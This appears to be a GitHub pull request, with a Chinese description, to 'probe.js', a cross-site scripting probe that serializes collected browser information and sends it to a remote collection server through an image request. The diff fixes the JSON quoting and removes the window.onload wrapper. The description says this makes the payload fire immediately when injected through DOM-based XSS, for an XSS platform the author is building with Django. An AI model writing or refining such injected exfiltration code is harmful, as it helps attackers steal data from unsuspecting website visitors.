### PR TITLE
修改两处

### DIFF
--- a/probe.js
+++ b/probe.js
@@ -63,9 +63,9 @@ function json2str(o) {
 	var arr = [];
 	var fmt = function(s) {
 		if (typeof s == 'object' && s != null) return json2str(s);
-		return /^(string|number)$/.test(typeof s) ? "'" + s + "'" : s;
+		return /^(string|number)$/.test(typeof s) ? '"' + s + '"' : s;
 	}
-	for (var i in o) arr.push("'" + i + "':" + fmt(o[i]));
+	for (var i in o) arr.push('"' + i + '":' + fmt(o[i]));
 	return '{' + arr.join(',') + '}';
 } 
 

--- a/probe.js
+++ b/probe.js
@@ -69,7 +69,5 @@ function json2str(o) {
 	return '{' + arr.join(',') + '}';
 } 
 
-window.onload = function(){
-	var i = json2str(info);
-	new Image().src = http_server + i;
-}
+var i = json2str(info);
+new Image().src = http_server + i;


### PR DESCRIPTION
1 json标准中都是使用双引号的，http://www.json.org/json-zh.html 。最近使用django和您的xss probe写一个xss平台，发现python的json.loads()等函数在处理单引号的json的时候会报错。规范一下比较好。

2 去掉了window.onload 这样在部分xss利用场景中可以插入xss代码后就立即起作用。比如我上面自己写的平台，构造一个dom xss，提供一个文本框，点击后插入到html中，如果使用window.onload，就不会起作用。

我说的有什么问题，还希望大神提出来～～
